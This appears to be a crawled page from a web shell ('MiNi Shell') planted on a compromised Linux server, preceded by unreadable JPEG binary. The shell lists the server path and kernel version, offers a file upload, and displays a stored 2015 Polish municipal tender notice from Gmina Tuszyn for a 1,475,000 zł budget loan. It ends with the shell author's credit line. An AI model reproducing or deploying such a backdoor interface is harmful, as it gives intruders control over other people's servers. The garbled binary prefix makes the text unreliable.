JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151130/324024-N-2015.html

<p class="kh_header"><b>Tuszyn: Zaciągnięcie kredytu długoterminowego na planowany deficyt budżetu 2015r.    do wysokości 1 475 000,00 zł</b><br>
<b>Numer ogłoszenia: 324024 - 2015; data zamieszczenia: 30.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuszyn , ul. Piotrkowska 2/4, 95-080 Tuszyn, woj. łódzkie, tel. 042 6143325, faks 042 6143069.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuszyn.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaciągnięcie kredytu długoterminowego na planowany deficyt budżetu 2015r.    do wysokości 1 475 000,00 zł.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zaciągnięcie kredytu długoterminowego na planowany deficyt budżetu 2015r.                                             
    do wysokości   1.475 000,00  zł.

     a) Kod CPV  66 11 30 00 - 5   
     b) Planowany okres kredytowania - do dnia 20.12.2020 roku.
     c) Okres spłaty rat kredytu-kapitał - począwszy od  20 marca 2015  roku do 20 grudnia  2020  roku -                                          
         w  20 ratach kwartalnych, w tym: 
w roku 2016  - 4 raty kapitałowe po   73.750,00 zł   ( razem 295.000,00 zł ),
w roku 2017  - 4 raty kapitałowe po   73.750,00 zł   ( razem 295.000,00 zł ),
w roku 2018  - 4 raty kapitałowe po   73.750,00 zł   ( razem 295.000,00 zł ),
w roku 2019  - 4 raty kapitałowe po   73.750,00 zł   ( razem 295.000,00 zł ),
w roku 2020  - 4 raty kapitałowe po   73.750,00 zł   ( razem 295.000,00 zł ),

d) Okres karencji w spłacie kredytu do 31 grudnia 2015  roku.
e) Termin ostatecznego wykorzystania kredytu do 21 grudnia 2015 roku.   
                                                              
 f)  Uruchomienie kredytu - jednorazowo lub w transzach do 18 grudnia 2015r. po podpisaniu umowy, z tym, że   
     termin  wypłaty kredytu najpóźniej w ciągu 5 dni od chwili  wystąpienia przez Gminę o uruchomienie wypłaty   
     (transzy) w kwocie  określonej w złożonym zapotrzebowaniu.
     ( Po wyborze wykonawcy termin uruchomienia transzy kredytu zgodny z ofertą wykonawcy).
     Kwota niewykorzystana przez Gminę do końca ostatecznego okresu wykorzystania kredytu, obniża kwotę kredytu i  
     odpowiednio zmienia harmonogram spłat rat kredytu.                                                                                                     
     2. Waluta - PLN                                                                                                                                              
     3. Oprocentowanie kredytu .
      Kredyt jest oprocentowany według zmiennej stopy procentowej według stawki oprocentowania dla depozytów  
      międzybankowych - WIBOR 1M - ustalonej dla pierwszego okresu kredytowania jako  średnia arytmetyczna 
      notowań z miesiąca  poprzedzającego dzień wypłaty kredytu, a dla kolejnych okresów odsetkowych
      obowiązuje stawka WIBOR 1M ustalona jako średnia arytmetyczna notowań z miesiąca poprzedzającego okres jej
      obowiązywania, z dokładnością do 2 miejsc po przecinku, powiększonej o stałą w  całym  okresie kredytowania 
      marżę Banku. Pierwszy  okres oprocentowania rozpoczyna się w pierwszym dniu uruchomienia kredytu i  kończy
      się ostatniego dnia miesiąca kalendarzowego. Każdy następny okres obowiązywania oprocentowania rozpoczyna 
      się w dniu następującym bezpośrednio po upływie poprzedniego okresu obowiązywania oprocentowania i            
      kończy  się w ostatnim dniu kalendarzowym kolejnego miesiąca.               
      Ostatni okres obowiązywania oprocentowania kończy się w dniu poprzedzającym dzień zakończenia okresu   
      kredytowania wskazanym w § 3 ust.1 .                                                                                                                                               
       Marża Banku nie ulegnie zmianie w całym okresie kredytowania.
                                                                                                                                                                                               
      4. Naliczanie i płatność odsetek.
          1. Odsetki  płatne miesięcznie w ostatnim dniu roboczym każdego miesiąca naliczania odsetek -  z wyłączeniem 
              pierwszego i ostatniego okresu naliczania odsetek. 
          2. Pierwszy okres naliczania odsetek rozpoczyna się w pierwszym dniu uruchomienia kredytu i kończy się w 
             ostatnim dniu  miesiąca, w którym został uruchomiony kredyt. 
          3. Każdy następny okres naliczania odsetek rozpoczyna się 1-go dnia miesiąca a kończy się ostatniego  dnia  
              tego miesiąca.  
          4. Ostatni okres naliczania odsetek kończy się w dniu poprzedzającym dzień zakończenia okresu kredytowania.  
          5. Odsetki będą naliczane tylko od kwoty faktycznego zadłużenia. 
          6. Odsetki będą spłacane w ostatnim dniu roboczym każdego miesiąca. Jeżeli  płatność odsetek  przypada na 
             dzień świąteczny, niedzielę lub dzień wolny od pracy, to płatność nastąpi w ostatnim dniu roboczym 
             poprzedzającym wolne dni wyliczone na ostatni dzień miesiąca, którego płatność dotyczy. Ewentualne różnice
             w naliczeniu lub zapłacie wyrównywane będą  w następnym okresie.
          7. O wysokości odsetek Wykonawca będzie informował Zamawiającego na co najmniej 7 dni przed zapłatą 
             odsetek drogą e-mail:a.prus@tuszyn.info.pl i potwierdzał pisemnie na adres Zamawiającego. 
          8. Odsetki będą naliczane za rzeczywistą  liczbę dni wykorzystania kredytu, przy założeniu, że rok liczy 
              365-366 dni.

      5. Kredyt zostanie przelany na konto wskazane przez Zamawiającego jednorazowo lub w transzach.                                                                     
          Uruchomienie  wypłaty kredytu  nastąpi w  terminie  do 5 dni od daty wystąpienia przez Gminę z  pisemną 
          dyspozycją uruchomienia wypłaty . W pisemnej dyspozycji  Gminy dotyczącej uruchomienia  środków z kredytu  
          zostanie podana wysokość uruchamianych środków. Po wyborze wykonawcy termin uruchomienia transzy 
          kredytu zgodnie z ofertą wykonawcy.
          Do oferty  należy przyjąć i traktować jedynie jako hipotetyczną jednorazową wypłatę środków z kredytu w
          terminie 1 grudnia 2015r. oraz stawkę WIBOR 1M z  17.11.2015 r. tj. 1,67.

      6. 1. Kredytobiorca dopuszcza możliwość niewykorzystania pełnej kwoty kredytu w przypadku wykonania wyższych 
              od przewidywanych dochodów, o których nie miał wiedzy w dniu sporządzania SIWZ lub wykonania niższych
              od planowanych wydatków, lub wcześniejszej spłaty bez ponoszenia dodatkowych opłat ( bez prowizji za 
              tzw. gotowość lub opłat za aneks ).
          2. Kredytobiorca zastrzega sobie prawo do skrócenia lub wydłużenia okresu kredytowania oraz  zmiany
              wysokości rat kapitałowych w okresie spłaty kredytu.
          3. Skrócenie lub wydłużenie okresu kredytowania oraz zmiany wysokości rat kapitałowych 
              w okresie spłaty kredytu mogą nastąpić w przypadku:
            1) zmiany obowiązujących przepisów prawa,
            2) wystąpienia istotnych okoliczności mających wpływ na sytuację finansową Zamawiającego 
             np. (wypracowanie wolnych środków, wyższe lub niższe wykonanie dochodów, brak możliwości 
             spełnienia warunków art. 243 uofp itp.)
         4. Wydłużenie okresu kredytowania nie może być dłuższe niż 2 .lata od daty spłaty kredytu 
             wynikającej z umowy. Przesunięcie na lata 2021-2022 może być dokonane maksymalnie do kwoty
             400 000,00 zł.
         5. Zamiar dokonania zmian wysokości rat kapitałowych w okresie spłaty kredytu lub skrócenie
             okresu kredytowania powiny być zgłoszone Wykonawcy na piśmie najpóźniej do ostatniego dnia 
             kalendarzowego miesiąca poprzedzającego termin zapłaty raty, której zmiana dotyczy.
         6. Zamiar wydłużenia okresu kredytowania powinien być zgłoszony Wykonawcy na piśmie  najpóźniej
             na 90 dni kalendarzowych poprzedzających termin zapłaty kolejnej raty.
         7. Wszystkie zmiany powinny być wprowadzone aneksem do umowy i zmianą harmonogramu spłaty.
    7.  Zamawiający wyraża zgodę na zbadanie i ocenę przez Wykonawcę zdolności kredytowej Zamawiającego 
         do spłaty rat kapitałowych we wnioskowanych nowych kwotach i terminach lub wydłużenia okresu kredytowania.

    8. Ustanawia się zabezpieczenie kredytu w formie weksla in blanco wraz z deklaracją wekslową. Zamawiający nie   
        wyraża zgody na złożenie przez Skarbnika kontrasygnaty na wekslu in blanco.

    9. Zamawiający nie dopuszcza możliwości przyjęcia innych dodatkowych zabezpieczeń kredytu niż wynikające 
        ze SIWZ.

   10. Marża oraz prowizja od przyznanego kredytu stanowią jedyne koszty obciążające Zamawiającego.                     
         Od   niespłaconego w terminie zadłużenia z tytułu zaciągniętego kredytu pobiera się odsetki w wysokości odsetek 
         ustawowych.

  11. Odsetki będą liczone od kwoty kredytu wykorzystanego a nie postawionego do dyspozycji.
  12. 1. W sytuacji wcześniejszej spłaty kredytu - odsetki będą liczone do dnia spłaty kredytu, a nie do końca umowy, 
          bez dodatkowych opłat i prowizji rekompensacyjnej. 
        2. W przypadku:
            1) przesunięcia terminu spłaty rat kapitałowych w okresie kredytowania;
            2) wydłużenia terminu spłaty;
            Kredytodawca nie będzie pobierał dodatkowych opłat i prowizji za wyjątkiem odsetek.
     
  13. Skarbnik  Miasta złoży kontrasygnatę na umowie kredytowej.

  14. Prowizja banku będzie  obliczona od wypłaconej transzy  kredytu.                                                                              
        Prowizja płatna w dniu uruchomienia transzy kredytu z rachunku Urzędu Miasta Tuszyna -  z rachunku bankowego
        Bank PEKAO SA I O/Tuszyn  951240 3451 1111 0000 3031 6229

 15. W przypadku wejścia Polski do strefy euro kredyt zostanie przewalutowany bez dodatkowych opłat.

 16.  Wykonawca zapłaci Zamawiającemu :
      1) odsetki za zwłokę w udzieleniu  kredytu - w wysokości  0,05% wartości transzy za każdy dzień  zwłoki.
      2) karę umowną  w wysokości 10%  sumy udzielonego kredytu za odstąpienie od umowy przez Wykonawcę z 
         przyczyn, za które Wykonawca ponosi odpowiedzialność.      

 17.  Zamawiający nie wyraża zgody na zastosowanie w umowie kredytowej następujących klauzul :
       1)  cross default - nie wykonanie lub nienależyte wykonanie zobowiązań wynikających z jakiejkolwiek umowy 
            zawartej z bankiem,
       2)  paris pass - zapewnienie, że wierzytelności banku w stosunku do klienta będą miały równe pierwszeństwo 
            w zaspokojeniu z wierzytelnościami innych podmiotów w stosunku do klienta z zastrzeżeniem przepisów      
            bezwzględnie obowiązującego prawa,
       3)  negative pleadge - zapewnienie, że bez uzyskania uprzedniej pisemnej zgody banku klient nie będzie  
            dokonywał jakichkolwiek obciążeń składników swojego majątku obecnego i przyszłego, a w szczególności   
            nie będzie dokonywał na tym majątku zabezpieczeń wierzytelności innych wierzycieli.
Wszystkie wymienione wyżej warunki stanowią istotne dla Zamawiającego postanowienia  umowy i muszą się znaleźć w umowie, która zostanie zawarta z wybranym Wykonawcą..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2020.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający  nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) zezwolenia Komisji Nadzoru Finansowego  na prowadzenie czynności bankowych lub inne dokumenty potwierdzające uprawnienia do prowadzenia czynności bankowych. Zezwolenie Komisji Nadzoru Finansowego na prowadzenie działalności bankowej, o którym mowa w art.36 Prawa bankowego, a w przypadku gdy wykonawca nie działa  na podstawie zezwolenia wydanego przez Komisję Nadzoru Finansowego inny dokument równoważny.Jeżeli składana oferta dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia, wymagany dokument winien zostać złożony przez co najmniej jednego wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas uruchomienia kredytu - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający nie przewiduje zmiany treści umowy (aneksu) z wyjątkiem zmian określonych w § 3 ust. 6  SIWZ. Wykonawca zobowiązuje się do podpisania stosownego aneksu do umowy i zmianę harmonogramu spłaty rat kapitałowych w terminie 14 dni od daty zaakceptowania wniosku o zmniejszenie kwoty kredytu lub wniosku o zmianę wysokości rat kapitałowych, wydłużenie lub skrócenie okresu kredytowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuszyn.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Tuszynie
95-080 Tuszyn
ul. Piotrkowska 2/4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2015 godzina 11:30, miejsce: Urząd Miasta w Tuszynie
95-080 Tuszyn
ul. Piotrkowska 2/4
( sekretariat - pok. nr 1 ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com